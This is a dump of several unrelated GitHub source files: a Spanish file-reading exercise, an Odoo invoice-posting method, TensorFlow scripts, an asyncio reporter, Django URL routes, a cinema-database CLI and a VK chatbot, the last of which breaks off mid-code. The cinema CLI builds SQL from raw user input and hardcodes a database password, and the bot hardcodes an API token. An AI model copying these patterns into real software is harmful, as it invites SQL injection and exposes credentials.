+{"seq_id":"26749168475","text":"class Archivo:\n def __init__(self, nombre, extension, delimitador):\n self.nombre = nombre\n self.extension = extension\n self.delimitador = delimitador\n self.texto = \"\"\n\n def get_nombre(self):\n return (self.nombre)\n\n def get_extension(self):\n return (self.extension)\n\n def abrir_Archivo(self):\n filas = open(self.nombre + \".\" + self.extension, \"r\")\n self.texto = filas.readline()\n texto_delimitado = self.texto.replace(\" \", delimitador)\n print(texto_delimitado)\n\n\nnombre_archivo = str(input(\"escriba el nombre del archivo: \"))\next = str(input(\"ingrese la extension: \"))\ndelimitador = str(input(\"ingrese un delimitador: \"))\narchivo = Archivo(nombre_archivo, ext, delimitador)\narchivo.abrir_Archivo()\n","repo_name":"pipo508/Trabajos-Practicos-Computaci-n","sub_path":"tp3/ejercicio 8/ejercicio8.py","file_name":"ejercicio8.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74756294335","text":"from odoo import models, fields, _\nfrom odoo.exceptions import RedirectWarning, UserError, ValidationError, AccessError\nfrom odoo.tools.misc import formatLang, format_date, get_lang\nfrom odoo.tools import float_compare, date_utils, email_split, email_re\nfrom collections import defaultdict\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n # original def _post, copiado y cambiado el nombre y modificado para que no postee la factura de pos.order\n def _post_global_invoices(self, soft=True):\n \"\"\"Post/Validate the documents.\n\n Posting the documents will give it a number, and check that the document is\n complete (some fields might not be required if not posted but are required\n otherwise).\n If the journal is locked with a hash table, it will be impossible to change\n some fields afterwards.\n\n :param soft (bool): if True, future documents are not immediately posted,\n but are set to be auto posted automatically at the set accounting date.\n Nothing will be performed on those documents before the accounting date.\n :return Model: the documents that have been posted\n \"\"\"\n if soft:\n future_moves = self.filtered(lambda move: move.date > fields.Date.context_today(self))\n future_moves.auto_post = True\n for move in future_moves:\n msg = _('This move will be posted at the accounting date: %(date)s', date=format_date(self.env, move.date))\n move.message_post(body=msg)\n to_post = self - future_moves\n else:\n to_post = self\n\n # `user_has_group` won't be bypassed by `sudo()` since it doesn't change the user anymore.\n if not self.env.su and not self.env.user.has_group('account.group_account_invoice'):\n raise AccessError(_(\"You don't have the access rights to post an invoice.\"))\n for move in to_post:\n if move.partner_bank_id and not move.partner_bank_id.active:\n raise UserError(_(\"The recipient bank account link to this invoice is archived.\\nSo you cannot confirm the invoice.\"))\n if move.state == 'posted':\n raise UserError(_('The entry %s (id %s) is already posted.') % (move.name, move.id))\n if not move.line_ids.filtered(lambda line: not line.display_type):\n raise UserError(_('You need to add a line before posting.'))\n if move.auto_post and move.date > fields.Date.context_today(self):\n date_msg = move.date.strftime(get_lang(self.env).date_format)\n raise UserError(_(\"This move is configured to be auto-posted on %s\", date_msg))\n\n if not move.partner_id:\n if move.is_sale_document():\n raise UserError(_(\"The field 'Customer' is required, please complete it to validate the Customer Invoice.\"))\n elif move.is_purchase_document():\n raise UserError(_(\"The field 'Vendor' is required, please complete it to validate the Vendor Bill.\"))\n\n if move.is_invoice(include_receipts=True) and float_compare(move.amount_total, 0.0, precision_rounding=move.currency_id.rounding) < 0:\n raise UserError(_(\"You cannot validate an invoice with a negative total amount. You should create a credit note instead. Use the action menu to transform it into a credit note or refund.\"))\n\n # Handle case when the invoice_date is not set. 
In that case, the invoice_date is set at today and then,\n # lines are recomputed accordingly.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if not move.invoice_date:\n if move.is_sale_document(include_receipts=True):\n move.invoice_date = fields.Date.context_today(self)\n move.with_context(check_move_validity=False)._onchange_invoice_date()\n elif move.is_purchase_document(include_receipts=True):\n raise UserError(_(\"The Bill/Refund date is required to validate this document.\"))\n\n # When the accounting date is prior to the tax lock date, move it automatically to the next available date.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if (move.company_id.tax_lock_date and move.date <= move.company_id.tax_lock_date) and (move.line_ids.tax_ids or move.line_ids.tax_tag_ids):\n move.date = move._get_accounting_date(move.invoice_date or move.date, True)\n move.with_context(check_move_validity=False)._onchange_currency()\n\n # Create the analytic lines in batch is faster as it leads to less cache invalidation.\n to_post.mapped('line_ids').create_analytic_lines()\n\n for move in to_post:\n move.message_subscribe([p.id for p in [move.partner_id] if p not in move.sudo().message_partner_ids])\n\n # Compute 'ref' for 'out_invoice'.\n if move._auto_compute_invoice_reference():\n to_write = {\n 'payment_reference': move._get_invoice_computed_reference(),\n 'line_ids': []\n }\n for line in move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable')):\n to_write['line_ids'].append((1, line.id, {'name': to_write['payment_reference']}))\n move.write(to_write)\n\n for move in to_post:\n if move.is_sale_document() \\\n and move.journal_id.sale_activity_type_id \\\n and (move.journal_id.sale_activity_user_id or move.invoice_user_id).id not in (self.env.ref('base.user_root').id, False):\n move.activity_schedule(\n date_deadline=min((date for date in move.line_ids.mapped('date_maturity') if date), default=move.date),\n activity_type_id=move.journal_id.sale_activity_type_id.id,\n summary=move.journal_id.sale_activity_note,\n user_id=move.journal_id.sale_activity_user_id.id or move.invoice_user_id.id,\n )\n\n customer_count, supplier_count = defaultdict(int), defaultdict(int)\n for move in to_post:\n if move.is_sale_document():\n customer_count[move.partner_id] += 1\n elif move.is_purchase_document():\n supplier_count[move.partner_id] += 1\n for partner, count in customer_count.items():\n (partner | partner.commercial_partner_id)._increase_rank('customer_rank', count)\n for partner, count in supplier_count.items():\n (partner | partner.commercial_partner_id)._increase_rank('supplier_rank', count)\n\n # Trigger action for paid invoices in amount is zero\n to_post.filtered(\n lambda m: m.is_invoice(include_receipts=True) and m.currency_id.is_zero(m.amount_total)\n ).action_invoice_paid()\n\n # Force balance check since nothing prevents another module to create an incorrect entry.\n # This is performed at the very end to avoid flushing fields before the whole processing.\n to_post._check_balanced()\n return to_post\n","repo_name":"farmaciasaguascalientes/fciags","sub_path":"modulos/zublime_invoicing_pos_global/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29723907581","text":"import tensorflow as tf\n# 数据集相关\nPATH2RECORD = '/home/uryuo/db/ntire/tfRecord/' # 将数据集转 tfrecord 位置\n# 原始图片 glob 路径\nIMG_HAZE_GT_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/trainGT/*.jpg'\nIMG_HAZE_NOISE_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/trainHaze/*.jpg'\nIMG_HAZE_VAILD_PATH = '/home/uryuo/db/ntire/image/haze_1/indoor/validateHaze/*.png'\n# tfrecord 命名\nRECORD_TRAIN_NAME = 'haze_1_train.tfrecord'\nRECORD_VAILD_NAME = 'haze_1_vaild.tfrecord'\n# record验证图片存储LUJING\nRECORD_ALIABLE_PATH = 'resource/'\n# trainning\nTRAIN_BATCH = 64\n# network\nIMG_CROP_SIZE = [512, 512, 3]\nINPUT_SIZE = [512, 512, 3]\n\n\n# limit gpu mem useage\ndef gpu_option():\n gpu_options = tf.GPUOptions(allow_growth=True)\n return tf.ConfigProto(gpu_options=gpu_options)\n","repo_name":"okingjerryo/deep_model_experiment","sub_path":"dehazeExperment/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"42404164171","text":"import asyncio\nfrom queue import PriorityQueue\nfrom queue import Queue\nfrom time import time\n\n\nclass ReporterManager:\n def __append(self, reporter):\n index = len(self.__reporters)\n self.__reporters.append(reporter)\n return index\n\n def listen_to(self, reporter):\n index = self.__append(reporter)\n report_at = int(time()) + reporter.interval()\n self.__put(report_at, index)\n\n def add_nop(self, reporter):\n index = self.__append(reporter)\n self.__put_nop(index)\n\n def __reporter(self, index):\n return self.__reporters[index]\n\n def __put(self, report_at, index):\n self.__reporter_queue.put((report_at, index))\n\n def __get(self):\n return self.__reporter_queue.get()\n\n def __empty(self):\n return self.__reporter_queue.empty()\n\n def __put_nop(self, index):\n self.__reporter_nop_queue.put_nowait(index)\n\n def __get_nop(self):\n return self.__reporter_nop_queue.get_nowait()\n\n def __empty_nop(self):\n return self.__reporter_nop_queue.empty()\n\n def __size_nop(self):\n return self.__reporter_nop_queue.qsize()\n\n def __check_nop_queue(self):\n if self.__empty_nop():\n return\n\n nop_size = self.__size_nop()\n for i in range(nop_size):\n index = self.__get_nop()\n reporter = self.__reporter(index)\n if reporter.interval() > 0:\n report_at = int(time()) + reporter.interval()\n self.__put(report_at, index)\n else:\n self.__put_nop(index)\n\n async def __async_loop(self, timeout=None):\n if timeout is not None:\n started_at = int(time())\n\n self.__curr_task = asyncio.current_task()\n while not self.__quit_requested:\n self.__check_nop_queue()\n if self.__empty():\n await asyncio.sleep(Const.SLEEP_NO_REPORT_SEC)\n continue\n\n now = int(time())\n (report_at, index) = self.__get()\n reporter = self.__reporter(index)\n\n if (timeout is not None\n and max(now, report_at) - started_at >= timeout):\n break\n\n if reporter.interval() <= 0:\n self.__put_nop(index)\n if self.__empty():\n await asyncio.sleep(Const.SLEEP_NO_REPORT_SEC)\n continue\n\n if report_at >= now:\n await asyncio.sleep(report_at - now)\n [report, alarm] = reporter.report()\n self.__report_queue.push(report)\n if alarm is not None:\n self.__alarm_queue.push(alarm)\n\n self.__put(report_at + reporter.interval(), index)\n\n def start_loop(self, timeout=None):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n try:\n loop.run_until_complete(self.__async_loop(timeout))\n except:\n pass\n\n def request_stop(self):\n self.__quit_requested = True\n self.__curr_task.cancel()\n\n def __init__(self, report_queue, alarm_queue):\n self.__reporter_queue = PriorityQueue()\n self.__reporter_nop_queue = Queue()\n self.__report_queue = report_queue\n self.__reporters = []\n self.__alarm_queue = alarm_queue\n self.__quit_requested = False\n","repo_name":"atmark-techno/Azure-IoT-samples","sub_path":"Armadillo-IoT_GW/modules/lib/reporter_manager.py","file_name":"reporter_manager.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"4477525989","text":"# written by aditya sharma\n# taken from https://www.datacamp.com/community/tutorials/cnn-tensorflow-python\n\n\n# Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n#matplotlib inline\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" #for training on gpu\n\n#loading training data\ndata = input_data.read_data_sets('data/MNIST/',one_hot=True)\n\n# reshaping images\ntrain_X = data.train.images.reshape(-1, 28, 28, 1)\ntest_X = data.test.images.reshape(-1, 28, 28, 1)\n\ntrain_y = data.train.labels\ntest_y = data.test.labels\n\n#defining hyper parameters\ntraining_iters = 1\nlearning_rate = 0.001\nbatch_size = 32\n\n#MNIST data input (img shape: 28*28)\nn_input = 28\n\n#MNIST total classes (0-9 digits)\nn_classes = 10\n\n#defining input and output placeholders\nx = tf.placeholder(\"float\", [None, 28,28,1])\ny = tf.placeholder(\"float\", [None, n_classes])\n\ndef conv2d(x, W, b, strides=1):\n # Conv2D wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\ndef maxpool2d(x, k=2):\n # Max filter\n return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],padding='SAME')\n\n#defining Lorentzian activation functions\ndef activationLorentz(x, x0, lambd):\n return (0.5*lambd)/(np.pi * (np.square(x - x0) + np.square(0.5*lambd)))\n\ndef activationDerivLorentz(x, x0, lambd):\n return (-16*lambd*(x - x0))/(np.pi * np.square(4*np.square(x - x0) + lambd**2)) \n\n\n#defining weights\nweights = {\n 'wc1': tf.get_variable('W0', shape=(3,3,1,32), initializer=tf.contrib.layers.xavier_initializer()), \n 'wc2': tf.get_variable('W1', shape=(3,3,32,64), initializer=tf.contrib.layers.xavier_initializer()), \n 'wc3': tf.get_variable('W2', shape=(3,3,64,128), initializer=tf.contrib.layers.xavier_initializer()), \n 'wd1': tf.get_variable('W3', shape=(4*4*128,128), initializer=tf.contrib.layers.xavier_initializer()), \n 'out': tf.get_variable('W6', shape=(128,n_classes), initializer=tf.contrib.layers.xavier_initializer()), \n}\nbiases = {\n 'bc1': tf.get_variable('B0', shape=(32), initializer=tf.contrib.layers.xavier_initializer()),\n 'bc2': tf.get_variable('B1', shape=(64), initializer=tf.contrib.layers.xavier_initializer()),\n 'bc3': tf.get_variable('B2', shape=(128), initializer=tf.contrib.layers.xavier_initializer()),\n 'bd1': tf.get_variable('B3', shape=(128), initializer=tf.contrib.layers.xavier_initializer()),\n 'out': tf.get_variable('B4', shape=(10), initializer=tf.contrib.layers.xavier_initializer()),\n}\n\ndef conv_net(x, weights, biases): \n\n # here we call the conv2d function we had defined above and pass the input image x, weights wc1 and bias bc1.\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 14*14 matrix.\n conv1 = maxpool2d(conv1, k=2)\n\n # Convolution Layer\n # here we call the conv2d function we had defined above and pass the input image x, weights wc2 and bias bc2.\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 7*7 matrix.\n conv2 = maxpool2d(conv2, k=2)\n\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n # Max Pooling (down-sampling), this chooses the max value from a 2*2 matrix window and outputs a 4*4.\n conv3 = 
maxpool2d(conv3, k=2)\n\n # Fully connected layer\n # Reshape conv2 output to fit fully connected layer input\n fc1 = tf.reshape(conv3, [-1, weights['wd1'].get_shape().as_list()[0]])\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\n fc1 = tf.nn.relu(fc1)\n # Output, class prediction\n # finally we multiply the fully connected layer with the weights and add a bias term. \n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\n return out\n\n# passing input through network\npred = conv_net(x, weights, biases)\n# computing cost function\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n# using adam optimizer to update weights and biases\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n#Here you check whether the index of the maximum value of the predicted image is equal to the actual labelled image. and both will be a column vector.\ncorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n\n#calculate accuracy across all the given images and average them out. \naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init) \n train_loss = []\n test_loss = []\n train_accuracy = []\n test_accuracy = []\n # training\n for i in range(training_iters):\n for batch in range(len(train_X)//batch_size):\n batch_x = train_X[batch*batch_size:min((batch+1)*batch_size,len(train_X))]\n batch_y = train_y[batch*batch_size:min((batch+1)*batch_size,len(train_y))] \n # Run optimization op (backprop).\n # Calculate batch loss and accuracy\n opt = sess.run(optimizer, feed_dict={x: batch_x,\n y: batch_y})\n loss, acc = sess.run([cost, accuracy], feed_dict={x: batch_x,\n y: batch_y})\n\n # Calculate accuracy for all 10000 mnist test images\n test_acc,valid_loss = sess.run([accuracy,cost], feed_dict={x: test_X,\n y : test_y})\n train_loss.append(loss)\n test_loss.append(valid_loss)\n train_accuracy.append(acc)\n test_accuracy.append(test_acc)\n print(\"Validation Loss: \" + str(valid_loss))","repo_name":"bendavidsteel/final-year-project","sub_path":"Misc/convneuralnetwork.py","file_name":"convneuralnetwork.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27818196072","text":"import psycopg2\nimport sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n\tmovieIndexQuery= \"\"\"CREATE INDEX employeeNames ON Employee(name);\"\"\"\n\n\t#connect to database\n\tpassw = \"Cinema2078\"\n\t#print(\"please enter the password for cs421g78:\")\n\t#pw= str(input())\n\tconnection = psycopg2.connect(user=\"cs421g78\",\n\t\tpassword=passw,\n\t\thost=\"comp421.cs.mcgill.ca\",\n\t\tport=\"5432\",\n\t\tdatabase=\"cs421\")\n\tprint(\"Welcome to the CinemaClub Databse Interace\")\n\tprint(\"\")\n\tdisplay_menu()\n\n\twhile(1): #infinite loop for user inputs \n\t\tprint(\"Input:\", end=\" \")\n\t\tuse_in= str(input())\n\t\tif(use_in==\"\"):\n\t\t\tprint(\"Invalid Input, please try again\")\n\t\t\tcontinue\n\t\telif(int(use_in)==0): #prompted menu to be displayed \n\t\t\tdisplay_menu()\n\t\telif(int(use_in)==10): # prompted exit \n\t\t\texit_prog(connection)\n\n\t\telif(int(use_in)==1):\n\t\t\tprocessOne(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==2):\n\t\t\tprocessTwo(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==3):\n\t\t\tprocessThree(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==4):\n\t\t\tprocessFour(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\n\t\telif(int(use_in)==5):\n\t\t\tprocessFive(connection)\n\t\t\tprint('Do you wish to continue? (Y/N)')\n\t\t\texitq=input()\n\t\t\tif exitq=='N':\n\t\t\t\texit_prog(connection)\n\t\t\telse:\n\t\t\t\tdisplay_menu()\n\t\telse:\n\t\t\tprint(\"Invalid Input, please try again\")\n\n\ndef processOne(connection): #Make a New Employee\n\tprint(\"What is their name?\")\n\tnew_name= str(input())\n\t#new_name= \"Aleks\"\n\tprint(\"What is their address?\")\n\tnew_add= str(input())\n\t#new_add= \"3434 St. Famille\" \n\tprint(\"What is their new email?\")\n\tnew_email= str(input())\n\t#new_email= \"avm@avm.ca\"\n\tprint(\"Where do they work? 
please enter a cid\")\n\tnew_cid= str(input())\n\t#new_cid= \"1461\"\n\tprint(\"What is new employeeID?\")\n\tnew_eid= str(input())\n\t#new_eid= \"11111\"\n\tprint(\"What is their starting salary?\")\n\tnew_sal= str(input())\n\t#new_sal= \"500000\"\n\tQuery =\"INSERT INTO employee(eid, cid, name, email, salary, address) VALUES('\"\n\tQuery_with_val = Query+new_eid+\"', '\"+new_cid+\"', '\"+new_name+\"', '\"+new_email+\"','\"+new_sal+\"', '\"+new_add+\"') RETURNING eid;\"\n\t#dat1 = pd.read_sql_query(Query_fin, connection)\n\tdat1 = pd.read_sql_query(Query_with_val, connection)\n\tdat1.set_index(['eid'])\n\tprint(dat1)\n\tprint(Query_with_val)\n\n\n#confirmed works\ndef processTwo(connection): #What movie titles are screening on this date\n\tprint(\"What is the date you would like to select\")\n\tin_date =str(input())\n\t#in_date =\"2121-02-01\"\n\tquery = \"SELECT name, date from screening s, movie m where s.movieid = m.movieid and date ='2121-02-01'\"\n\tq_input = \"SELECT name from screening s, movie m where s.movieid = m.movieid and date =\"\n\tq_fin = q_input+\"'\"+in_date+\"';\"\n\n\tdat1 = pd.read_sql_query(q_fin, connection)\n\tdat1.set_index(['name'])\n\tprint(\"Movie Titles:\\n\")\n\tprint(dat1)\n\tprint(q_fin)\n\n\n#confirmed works\ndef processThree(connection): #How many cinemas are have screened a movie\n\tprint(\"What movie are you looking for?\")\n\tmovie =str(input())\n\t#movie =\"quis urna. Nunc quis arcu\"\n\tquery = \"SELECT count(cid) from screening s, movie m where m.name like '%\"+movie+\"%' and m.movieid=s.movieid\"\n\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint(dat1)\n\tprint(\"Number of cinemas that screened the movie:\\n\")\n\tprint(dat1['count'][0])\n\tprint(query)\n\n\ndef processFour(connection): # How many Items has a customer purchased the\n\tprint(\"Email of the customer?\")\n\temail =str(input())\n\t#email='Quisque@sodales.co.uk'\n\tquery=\"SELECT SUM(quantity) from orders o, customer c where o.custid=c.custid and c.custemail='\"+email+\"'\"\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint('Total items bought')\n\tprint(dat1['sum'][0])\n\tprint(query)\n\ndef processFive(connection): #Show which cinemas have a room larger than 260 seats\n\n\tprint(\"What size of room are you looking for?\")\n\tcap=input()\n\t#cap=280\n\tquery= \"\"\"select address, nbr as room_nb, capacity from cinema c, room r\n\t\t\twhere c.cid=r.cid \n\t\t\tand r.capacity > \"\"\"+str(cap)\n\n\tdat1 = pd.read_sql_query(query, connection)\n\tprint(dat1.keys())\n\tdat1.set_index(['address', 'room_nb', 'capacity'])\n\tprint(\"Cinemas:\\n\")\n\tprint(dat1)\n\tprint(query)\n\n\n\ndef exit_prog(connection):\n\t#close connection to database\n\tconnection = None\n\tprint(\"Exiting Program\")\n\tsys.exit()\n\n\ndef display_menu():\n\tprint(\"-----------------Program Menu-----------------\")\n\tprint(\"Enter the associted number to begin a process:\")\t\n\tprint(\"0: Redisplay Menu\")\n\tprint(\"1: Create a new Employee\")\n\tprint(\"2: What movie screenings are on this date\")\n\tprint(\"3: How many cinemas are have screened a certain movie\")\n\tprint(\"4: How many Items has a customer purchased \")\n\tprint(\"5: Show which cinemas have a room larger than x seats\")\n\tprint(\"10: Exit Program\")\n\nmain()\n","repo_name":"AleksasMurauskas/COMP421Project3","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"18757883262","text":"from django.conf.urls import patterns, include, url\n#from django.views.generic.base import TemplateView\nfrom django.http import HttpResponse\nfrom settings import MEDIA_ROOT\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n #url(r'^pic/(?P.*)$', 'util.web_helpers.pic_csrf.pic_csrf', name='pic_csrf'),\n #url(r'^$', 'apps.cc.views.index', name='index'),\n url(r'^$', 'apps.cc.views.index', name='index'),\n url(r'^api$', 'apps.cc.views.api', name='api'),\n url(r'^url/(?P\\d+)/delete$', 'apps.cc.views.delete', name='delete'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^500/$', 'util.web_helpers.error_page.server_error_500', name='server_error_500'),\n url(r'^404/$', 'util.web_helpers.error_page.server_error_404', name='server_error_404'),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': MEDIA_ROOT }),\n url(r'^robots\\.txt$', lambda r: HttpResponse(\"User-agent: *\\nDisallow: /\", mimetype=\"text/plain\")),\n)\n\nhandler404 = 'util.web_helpers.error_page.server_error_404'\nhandler404 = 'util.web_helpers.error_page.server_error_500'","repo_name":"giveme168/zhiqu","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"43600054775","text":"import vk_api\nfrom random import randint\nimport keyboards_main\nimport time\nimport methods\nimport sql_connect\n\nstart_time = time.time()\ntoken = \"vk1.a.-1Nd_H3CRuKOQfBtctmLINsMx6CWFAD-WrdhgaZ0Hryr9DXUP7RXFxlspYtt-J05daqNQnKtEoR15u2IEQcmOVPH2gKe8YnFwbzIKtjmKHNyt6sE0Bi_TMet1MvpN82aF6NbiFuI3Iw2xhAXaXMT_aEKvt76egb0jZM20frQhkVgwD85xhk0n9mWJWLv9-c45D_aXHz_n7xYRAGW6kXCxg\"\nvk = vk_api.VkApi(token=token)\nvk._auth_token()\nb = 0\n\n\ndef writing(print_text, us_id, k_b):\n global b\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000),\n \"keyboard\": k_b.get_keyboard()}))\n while a < b:\n print('Ошибка отправки')\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000),\n \"keyboard\": k_b.get_keyboard()}))\n b = a\n\n\ndef writing_only_text(print_text, us_id):\n global b\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000)}))\n while a < b:\n print('Ошибка отправки')\n a = (vk.method(\"messages.send\", {\"user_id\": us_id, \"message\": print_text, \"random_id\": randint(1, 1000)}))\n b = a\n\n\ndef searching_in_db(vk_id):\n return sql_connect.db_connection_select(f'SELECT * FROM users WHERE vk_id = {vk_id} LIMIT 1;')\n\n\ndef return_ammunition_text(us_id, vk_id):\n generated_string = ''\n for work_line in sql_connect.db_connection_select_tuple(f'SELECT durability_left, (SELECT deffence FROM ammunition '\n f'WHERE id = ammunition_id), (SELECT attack FROM '\n f'ammunition WHERE id = ammunition_id), '\n f'(SELECT durability FROM ammunition WHERE id = '\n f'ammunition_id), (SELECT name FROM ammunition WHERE id = '\n f'ammunition_id) FROM ammunition_users WHERE user_id = '\n f'{us_id};'):\n var_string = f'{work_line[4]}: \\nатака = {work_line[2]}\\nзащита = {work_line[1]}\\nПрочность = {work_line[0]}/' \\\n f'{work_line[3]}\\n\\n'\n generated_string += var_string\n writing('В инвентаре у игрока лежат следующие артефакты:\\n\\n' + generated_string, vk_id, keyboards_main.keyboard_4)\n\n\ndef shop(us_id, vk_id):\n if sql_connect.db_connection_select(f'SELECT id FROM shop WHERE location_id = (SELECT location_id FROM users '\n f'WHERE id = {us_id})') is not None:\n player.part = 'shop'\n generated_string = ''\n kb_list = ['Меню']\n for line_1 in shop_request(us_id):\n var_string = f'{line_1[0]}: \\nатака = {line_1[1]} \\nзащита = {line_1[2]}\\nПрочность: {line_1[3]}\\nЦена: ' \\\n f'{line_1[4]}\\n\\n'\n generated_string += var_string\n kb_list.append(line_1[0])\n writing(\"Содержимое первой страницы магазина:\\n\\n\" + generated_string,\n vk_id, keyboards_main.new_keyboard(kb_list))\n\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_3)\n\n\ndef buying_ammunition(us_id, work_text, vk_id):\n working_price = sql_connect.db_connection_select(f\"SELECT price FROM ammunition WHERE name = '{work_text}';\")\n if player.money >= working_price[0]:\n sql_connect.db_connection_insert(f\"INSERT INTO ammunition_users (user_id, ammunition_id, durability_left) \"\n f\"VALUES ({us_id}, (SELECT id FROM ammunition WHERE name = '{work_text}'), \"\n f\"(SELECT durability FROM ammunition WHERE id = (SELECT id FROM ammunition \"\n f\"WHERE name = '{work_text}')));\")\n player.money -= working_price[0]\n writing_only_text(f'Герой приобрёл {work_text}', vk_id)\n else:\n writing_only_text('К сожалению у тебя недостаточно средств на приобретение данного артефакта(', 
vk_id)\n\n\ndef shop_request(us_id):\n return sql_connect.db_connection_select_tuple(f'SELECT name, attack, deffence, durability, price FROM ammunition '\n f'WHERE id IN (SELECT ammunition_id FROM ammunition_shop WHERE '\n f'shop_id = (SELECT id FROM shop WHERE location_id = (SELECT '\n f'location_id FROM users WHERE id = {us_id})));')\n\n\nclass Player:\n room = 1\n part = 'main'\n\n def __init__(self, name, vk_id, player_id, country, level, location_id, race, born, experience, money, mem_time):\n self.name = name\n self.vk_id = vk_id\n self.id = player_id\n self.country = country\n self.level = level\n self.location_id = location_id\n self.race = race\n self.born = born\n self.experience = experience\n self.money = money\n self.mem_time = mem_time\n\n\nclass PlayerInRegistration:\n name = ''\n country = ''\n location = ''\n race = ''\n room = 1\n\n def __init__(self, vk_id, mem_time):\n self.vk_id = vk_id\n self.mem_time = mem_time\n\n\nplayers = []\nlist_of_players_id = []\n\nwhile True:\n try:\n messages = vk.method(\"messages.getConversations\", {\"offset\": 0, \"count\": 20, \"filter\": \"unanswered\"})\n print(\"%s секунд на цикл\" % (time.time() - start_time))\n start_time = time.time()\n if messages[\"count\"] >= 1:\n for message in range(messages[\"count\"]):\n text = messages['items'][message]['last_message']['text']\n user_id = messages['items'][message]['last_message']['from_id']\n if user_id not in list_of_players_id:\n user_now = searching_in_db(int(f'{user_id}'))\n if user_now is None:\n if text == \"Регистрация\":\n print('регистрация игрока в базе данных')\n players.append(PlayerInRegistration(user_id, time.time()))\n list_of_players_id.append(user_id)\n writing_only_text('Введи своё игровое имя', user_id)\n else:\n writing_only_text(\"Введи 'Регистрация', начнём твою регистрацию в игре\", user_id)\n else:\n list_of_players_id.append(user_now[2])\n print(list_of_players_id)\n players.append(\n Player(user_now[1], user_now[2], user_now[0], user_now[3], user_now[6], user_now[7],\n user_now[5], user_now[4], user_now[8], user_now[9], time.time()))\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n elif user_id in list_of_players_id:\n for player in players:\n if player.vk_id == user_id:\n player.mem_time = time.time()\n if type(player) == PlayerInRegistration:\n if player.room == 1:\n player.name = text\n player.room = 2\n writing('Выбери страну', user_id, keyboards_main.keyboard_0)\n elif 